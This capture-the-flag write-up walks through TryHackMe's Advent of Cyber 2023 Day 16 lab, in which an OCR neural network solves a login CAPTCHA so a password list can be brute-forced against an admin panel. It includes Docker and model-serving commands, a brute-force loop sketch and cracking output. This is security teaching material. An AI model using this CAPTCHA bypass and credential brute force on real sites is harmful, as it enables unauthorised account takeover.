Day 16 – ML CAPTCHA automation – Advent of Cyber 2023 – TryHackMe Challenge

Day 16 in the Advent of Cyber 2023. McGreedy has locked McSkidy out of his Elf(TM) HQ admin panel by changing the password! To make it harder for McSkidy to perform a hack-back, McGreedy has altered the admin panel login so that it uses a CAPTCHA to prevent automated attacks. A CAPTCHA is a small test, like providing the numbers in an image, that needs to be performed to ensure that you are a human. This means McSkidy can’t perform a brute force attack. Or does it?
After the great success of using machine learning to detect defective toys and phishing emails, McSkidy is looking to you to help him build a custom brute force script that will make use of ML to solve the CAPTCHA and continue with the brute force attack. There is, however, a bit of irony in having a machine solve a challenge specifically designed to tell humans apart from computers.

WARNING: Spoilers and challenge-answers are provided in the following writeup.
An official walk-through video is also available on YouTube - Alh4zr3d.

Day 16 - Can't CAPTCHA this Machine!

Building on the challenges of the last few days, today we're presented with more complex neural network structures. Convolutional Neural Networks (CNNs) are a type of ML structure that can perform feature extraction from a dataset by themselves. This is very useful for optical character recognition, or for understanding what's in a picture.
When scanning an image, a CNN performs "convolution", meaning that it summarises the image into a smaller representation. This is "simply" done by creating a "kernel matrix" that slides across the height and width of the image and calculates a summary of the pixels it covers. The result is a set of summaries that is smaller than the original dataset (the pixels). To optimize further, the CNN then performs "pooling". This is another step with the aim of producing a smaller feature set for the ML model to work on. It is done by summarising further, either by keeping the highest value, keeping the lowest value, calculating an average, or applying some other algorithm.
These features are then fed as input to the ML model, like we saw yesterday and the day before.
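
To make convolution and pooling a bit more concrete, here is a minimal pure-Python sketch. It is not how Attention OCR or TensorFlow implement it; the toy image, the kernel values and the function names are made up for illustration only.

```python
def convolve2d(image, kernel):
    """Slide the kernel over the image (no padding, stride 1).

    Each output value is the sum of pixel * kernel weight for the window
    the kernel currently covers. As in most ML libraries, the kernel is
    not flipped.
    """
    kh, kw = len(kernel), len(kernel[0])
    out_h = len(image) - kh + 1
    out_w = len(image[0]) - kw + 1
    return [
        [
            sum(image[r + i][c + j] * kernel[i][j]
                for i in range(kh) for j in range(kw))
            for c in range(out_w)
        ]
        for r in range(out_h)
    ]


def max_pool(feature_map, size=2):
    """Keep only the highest value in each non-overlapping size x size window."""
    return [
        [
            max(feature_map[r + i][c + j]
                for i in range(size) for j in range(size))
            for c in range(0, len(feature_map[0]) - size + 1, size)
        ]
        for r in range(0, len(feature_map) - size + 1, size)
    ]


# Toy 5x5 "image": a bright vertical stripe in the middle column.
image = [[0, 0, 9, 0, 0] for _ in range(5)]

# Illustrative 2x2 kernel that reacts to a dark-to-bright step (left to right).
kernel = [[-1, 1],
          [-1, 1]]

features = convolve2d(image, kernel)  # 5x5 pixels -> 4x4 summaries
pooled = max_pool(features)           # 4x4 summaries -> 2x2 features

print(features)
print(pooled)
```

The 25 pixels end up as 4 features, which is the kind of reduction the text above describes. In a real CNN the kernel values are not chosen by hand but learned during training.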

The Challenge

Firstly, we're asked a few questions about the usage of CNNs in ML. The key process of training a neural network that is taken care of by using a CNN is "Feature Extraction", as this is part of the modeling. The process within the CNN that does this is called "Convolution", while the process of reducing the number of features is called "Pooling".
In today's challenge, an off-the-shelf CNN, Attention OCR, is used to train a CAPTCHA-cracking OCR model.

We're now tasked with brute-forcing our way into a login page on the provided machine.

Login form

But as seen, the login uses a numerical CAPTCHA, which makes ordinary brute-forcing tools a dead end. However, a CNN model for OCR has been trained. To use this model, we need to extract it and serve it using TensorFlow.
As seen in the console extract below, we start the docker container used for the model training, open a shell in it, and copy the exported model data to the attached directory. We then exit the container's shell and stop the container again.

ubuntu@tryhackme:~/Desktop$ docker run -d -v /tmp/data:/tempdir/ aocr/full
dcd58c5f819cd3b2f1ba24a06382f6cbb82a8a274251d234cb5753e4d8e396af
ubuntu@tryhackme:~/Desktop$ docker ps
CONTAINER ID   IMAGE                COMMAND                  CREATED         STATUS         PORTS                                                 NAMES
dcd58c5f819c   aocr/full            "/run_jupyter.sh --a…"   6 seconds ago   Up 4 seconds   6006/tcp, 8888/tcp                                    happy_bell
ubuntu@tryhackme:~/Desktop$ docker exec -it dcd58c5f819c /bin/bash
root@dcd58c5f819c:/ocr# cp -r model /tempdir/
root@dcd58c5f819c:/ocr# exit
exit
ubuntu@tryhackme:~/Desktop$ docker kill dcd58c5f819c
dcd58c5f819c
ubuntu@tryhackme:~/Desktop$ docker ps
CONTAINER ID   IMAGE                COMMAND                  CREATED          STATUS          PORTS                                                 NAMES

We then need to serve the model using TensorFlow Serving, which runs in a docker container. This gives us an endpoint at http://localhost:8501/v1/models/ocr that we can use to get predictions of which numbers (and in which sequence) are in the CAPTCHA.
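
As a rough sketch of how a script could ask this endpoint for a prediction: TensorFlow Serving's REST API accepts a POST to the model URL with `:predict` appended, and binary data is sent as a `{"b64": ...}` object. The input name `input` and the helper names below are assumptions for illustration; the real names depend on the exported model's signature and on what bruteforce.py actually does.

```python
import base64
import json
import urllib.request

# Endpoint from the writeup plus the ":predict" verb of the REST API.
MODEL_URL = "http://localhost:8501/v1/models/ocr:predict"


def build_predict_payload(image_bytes):
    """Wrap raw image bytes in a columnar ("inputs") predict request.

    Assumption: the exported model takes a single base64-encoded image
    under the input name "input". Adjust this to the real signature.
    """
    encoded = base64.b64encode(image_bytes).decode("ascii")
    return {
        "signature_name": "serving_default",
        "inputs": {"input": {"b64": encoded}},
    }


def predict(image_bytes, url=MODEL_URL):
    """POST the image to the model server and return the decoded JSON reply."""
    body = json.dumps(build_predict_payload(image_bytes)).encode("utf-8")
    request = urllib.request.Request(
        url, data=body, headers={"Content-Type": "application/json"}
    )
    with urllib.request.urlopen(request, timeout=10) as response:
        return json.loads(response.read().decode("utf-8"))
```

Calling `predict(open("captcha.png", "rb").read())` (with a hypothetical captcha.png) only works while the tensorflow/serving container is running; the reply's structure again depends on the exported model.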

ubuntu@tryhackme:~/Desktop$ docker run -t --rm -p 8501:8501 -v /tmp/data/model/exported-model:/models/ -e MODEL_NAME=ocr tensorflow/serving

On the provided machine, we're given a Python script, bruteforce.py, as well as a passwords.txt list used in the brute-force attempt. As the console extract below shows, the script runs through all the passwords and only submits a CAPTCHA answer if the ML model is fairly confident in its prediction.

ubuntu@tryhackme:~/Desktop/bruteforcer$ python3 bruteforce.py 
[-] Invalid credential pair -- Username: admin Password: Spring2017
[-] Invalid credential pair -- Username: admin Password: Spring2021
[-] Invalid credential pair -- Username: admin Password: spring2021
[-] Invalid credential pair -- Username: admin Password: Summer2021
[-] Invalid credential pair -- Username: admin Password: summer2021
[-] Invalid credential pair -- Username: admin Password: Fall2021
[-] Prediction probability too low, not submitting CAPTCHA
[-] Invalid credential pair -- Username: admin Password: fall2021
[-] Invalid credential pair -- Username: admin Password: Winter2021
[-] Invalid credential pair -- Username: admin Password: winter2021
[-] Invalid credential pair -- Username: admin Password: Summer2019
[-] Invalid credential pair -- Username: admin Password: summer2019
[-] Invalid credential pair -- Username: admin Password: Autumn2019
[...REMOVED FOR BREVITY...]
[-] Invalid credential pair -- Username: admin Password: adminadmin
[-] Prediction probability too low, not submitting CAPTCHA
[-] Invalid credential pair -- Username: admin Password: admins
[-] Invalid credential pair -- Username: admin Password: goat
[-] Invalid credential pair -- Username: admin Password: sysadmin
[-] Invalid credential pair -- Username: admin Password: water
[-] Invalid credential pair -- Username: admin Password: dirt
[-] Invalid credential pair -- Username: admin Password: air
[-] Invalid credential pair -- Username: admin Password: earth
[+] Access Granted!! -- Username: admin Password: ReallyNotGonnaGuessThis
ubuntu@tryhackme:~/Desktop/bruteforcer$
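
The behaviour seen in this output can be sketched roughly as below. This is not the provided bruteforce.py, just a simplified illustration of the idea: the three callables are hypothetical stand-ins for fetching a CAPTCHA, asking the OCR model, and submitting the login form, and the 0.9 threshold is an assumed value for "fairly confident". It also ignores the case where a confident prediction is still wrong.

```python
def brute_force(passwords, fetch_captcha, solve_captcha, try_login,
                username="admin", min_probability=0.9):
    """Try each password, fetching a new CAPTCHA whenever the model is unsure.

    fetch_captcha()      -> image bytes of a fresh CAPTCHA (hypothetical)
    solve_captcha(image) -> (answer, probability) from the OCR model (hypothetical)
    try_login(username, password, answer) -> True if access is granted (hypothetical)
    """
    for password in passwords:
        # Keep requesting CAPTCHAs until the model is confident enough,
        # so no login attempt is wasted on a likely wrong answer.
        while True:
            answer, probability = solve_captcha(fetch_captcha())
            if probability >= min_probability:
                break
            print("[-] Prediction probability too low, not submitting CAPTCHA")

        if try_login(username, password, answer):
            print(f"[+] Access Granted!! -- Username: {username} Password: {password}")
            return password
        print(f"[-] Invalid credential pair -- Username: {username} Password: {password}")
    return None
```

Passing the helpers in as arguments keeps the loop independent of the web and model details, which also makes it easy to try out with dummy functions before pointing it at a real target.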

And with that, we obtained the password via brute-forcing, even though a CAPTCHA had been introduced on the login page. For the last question, we need to use the credentials to log on to the page and retrieve the flag.

Website flag
